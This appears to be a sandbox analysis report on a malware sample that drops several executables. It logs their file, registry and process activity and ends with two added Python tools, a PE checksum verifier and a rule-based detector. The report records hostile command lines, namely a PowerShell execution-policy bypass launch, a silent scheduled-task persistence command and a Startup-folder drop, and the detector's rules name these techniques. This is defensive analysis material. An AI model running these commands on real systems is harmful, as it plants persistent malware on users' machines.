Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\scoped_dir8680_1554559384
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\chrome_BITS_8680_1352400022
Source: ADFoyxP.exe | Static file information: File size 3665550 > 1048576
Source: ADFoyxP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ad_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000025.00000003.1914137812.0000012CDEE83000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665087028.0000012CDEE65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: K\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbB source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statees source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\crobat\DCG source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateB source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statev source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateQ source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062Z source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State0F2 source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: x\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665087028.0000012CDEE82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbx source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local StateLvA source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: winload_prod.pdb@0 source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062 source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ogFiles\0F2\en-US source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: ADFoyxP.exe | Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
Source: curcuma.exe.26.dr | Static PE information: real checksum: 0x27934f should be: 0x28b32f
Source: curcuma.exe.26.dr | Static PE information: section name: .xdata
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00800315 push cs; retn 007Fh 23_2_00800318
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D0DE6 push ecx; ret 23_2_007D0DF9
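The two checksum mismatches reported above (the submitted ADFoyxP.exe and the dropped curcuma.exe) are cheap to confirm offline. The block below is an added example, not code from the report or from the sample: it recomputes the optional-header CheckSum with the documented PE algorithm (sum the file as 32-bit words with carry folding, skip the CheckSum field itself, fold to 16 bits, add the file length) and compares it with the stored value. The minimal PE image it builds for its self-test is constructed test data that would not load; the report's actual values are not embedded.

```python
"""Recompute the PE optional-header CheckSum and compare it with the stored one.

Added example, not part of the sandbox report. build_minimal_pe() produces
constructed test data only; it is not the analysed sample."""
import struct


def _checksum_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum; raises ValueError if not a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # PE signature (4) + COFF file header (20) = start of the optional header.
    # CheckSum sits at offset 64 of the optional header in both PE32 and PE32+.
    return e_lfanew + 4 + 20 + 64


def compute_pe_checksum(data: bytes) -> int:
    """Documented PE checksum: dword sum with carry folding, CheckSum field skipped,
    folded to 16 bits, plus the unpadded file length."""
    skip = _checksum_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)      # pad to a whole number of dwords
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue                               # the field being computed is treated as zero
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:                       # fold the carry back in (ones'-complement style)
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def stored_pe_checksum(data: bytes) -> int:
    """The CheckSum value as written in the optional header."""
    return struct.unpack_from("<I", data, _checksum_offset(data))[0]


def checksum_matches(data: bytes) -> bool:
    """True when the stored CheckSum equals the recomputed one."""
    return stored_pe_checksum(data) == compute_pe_checksum(data)


def stamp_checksum(data: bytes) -> bytes:
    """Copy of the image with a correct CheckSum written in (what a linker with /RELEASE does)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, _checksum_offset(data), compute_pe_checksum(data))
    return bytes(buf)


def build_minimal_pe(size: int = 0x200) -> bytes:
    """Constructed test image: DOS header, PE signature, COFF header and a PE32
    optional header with no sections. Enough for the checksum code; it does not load."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    e_lfanew = 0x80
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # COFF header: Machine=i386, 0 sections, SizeOfOptionalHeader=224, Characteristics=EXE|32-bit
    struct.pack_into("<HHIIIHH", buf, e_lfanew + 4, 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = e_lfanew + 24
    struct.pack_into("<H", buf, opt, 0x10B)        # PE32 magic
    struct.pack_into("<I", buf, opt + 56, 0x1000)  # SizeOfImage
    struct.pack_into("<I", buf, opt + 60, size)    # SizeOfHeaders
    return bytes(buf)                              # CheckSum left at 0, as many real builds ship it


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:                      # e.g. python pe_checksum.py ADFoyxP.exe
        with open(path, "rb") as fh:
            blob = fh.read()
        print(f"{path}: stored 0x{stored_pe_checksum(blob):x} computed 0x{compute_pe_checksum(blob):x} "
              f"{'OK' if checksum_matches(blob) else 'MISMATCH'}")
```

Point it at the dropped files to reproduce the report's "real checksum ... should be" pairs. A mismatch on its own is a weak signal, because user-mode binaries are routinely linked with CheckSum left at zero; a non-zero but wrong value on a packed drop is the more telling case, since it means the image was patched after the linker stamped it.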

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\353090\Seat.com
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\curcuma.exe
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\353090\Seat.com
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_008426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 23_2_008426DD
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007CFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 23_2_007CFC7C
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
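The command lines and drop locations this report records are the raw material for detection: powershell launched with ExecutionPolicy Bypass to start a binary from %LOCALAPPDATA%\Temp (Data Obfuscation section), schtasks /create whose action is wscript //B on a .js file plus a .url dropped into the per-user Startup folder (this section), and a signed RegAsm.exe together with two ".com" PE files executing out of AppData (Persistence and Installation Behavior section). The block below is an added example, not part of the report or of Joe Sandbox's tooling: a small rule set run over hand-constructed process-creation and file-creation events whose paths mirror the ones above. The ProcEvent shape, rule names and regexes are assumptions; no telemetry from the analysis is embedded.

```python
"""Rule-based triage for the command-line and drop patterns seen in this report.

Added example, not part of the sandbox report. SAMPLE_EVENTS are hand-constructed
stand-ins shaped like Sysmon EventID 1 / 11 fields, not the sandbox's telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    image: str      # full path of the new process
    cmdline: str    # its command line
    parent: str     # full path of the parent process


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_appdata(path: str) -> bool:
    """User-writable profile location; signed system binaries do not belong here."""
    return re.match(r"(?i)^[a-z]:\\users\\[^\\]+\\appdata\\", path) is not None


# -ExecutionPolicy Bypass, -ep bypass, and the dash-less spelling seen in this report.
_BYPASS = re.compile(r"(?i)(?:executionpolicy|-ep)\s+bypass\b")
# A launch target under %LOCALAPPDATA%\Temp with an executable extension.
_TEMP_TARGET = re.compile(r"(?i)appdata\\local\\temp\\[^'\"\s]+\.(?:exe|com|scr|dll)\b")
# wscript/cscript with //B (batch mode: no script error dialogs), other args allowed in between.
_SILENT_WSH = re.compile(r"(?i)\b[wc]script(?:\.exe)?\s+(?:\S+\s+)*//b\b")

RULES = [
    ("powershell_execpolicy_bypass",
     lambda e: _basename(e.image) == "powershell.exe" and _BYPASS.search(e.cmdline) is not None),
    ("powershell_starts_temp_binary",
     lambda e: _basename(e.image) == "powershell.exe" and _TEMP_TARGET.search(e.cmdline) is not None),
    ("schtasks_silent_wscript",
     lambda e: _basename(e.image) == "schtasks.exe" and "/create" in e.cmdline.lower()
     and _SILENT_WSH.search(e.cmdline) is not None),
    ("regasm_outside_framework_dir",
     lambda e: _basename(e.image) == "regasm.exe"
     and not e.image.lower().startswith("c:\\windows\\microsoft.net\\")),
    ("com_extension_under_appdata",
     lambda e: _basename(e.image).endswith(".com") and _in_appdata(e.image)),
]

STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
STARTUP_EXTS = (".url", ".lnk", ".js", ".vbs", ".bat", ".cmd", ".hta", ".ps1")


def evaluate(event: ProcEvent) -> List[str]:
    """Names of every rule the event satisfies; an empty list means nothing fired."""
    return [name for name, pred in RULES if pred(event)]


def startup_file_suspicious(path: str) -> bool:
    """File-creation rule: a shortcut or script dropped into the per-user Startup folder."""
    low = path.lower()
    return STARTUP_DIR in low and low.endswith(STARTUP_EXTS)


def triage(events) -> Dict[str, List[str]]:
    """Map each offending image path to the rules it tripped; quiet images are omitted."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        names = evaluate(ev)
        if names:
            hits.setdefault(ev.image, []).extend(names)
    return hits


# Constructed events mirroring the paths in this report, plus two benign controls.
CMD = r"C:\Windows\SysWOW64\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"""powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'""",
              CMD),
    ProcEvent(r"C:\Windows\SysWOW64\schtasks.exe",
              r"""schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F""",
              CMD),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\353090\Seat.com", "Seat.com", CMD),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe", "RegAsm.exe",
              r"C:\Users\user\AppData\Local\Temp\353090\Seat.com"),
    ProcEvent(r"C:\Windows\SysWOW64\tasklist.exe", "tasklist", CMD),        # too noisy on its own; no rule
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",   # legitimate location
              "RegAsm.exe /codebase foo.dll", r"C:\Windows\explorer.exe"),
]
SAMPLE_STARTUP_FILE = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url"

if __name__ == "__main__":
    for image, names in triage(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(names)}")
    print(SAMPLE_STARTUP_FILE, "->", startup_file_suspicious(SAMPLE_STARTUP_FILE))
```

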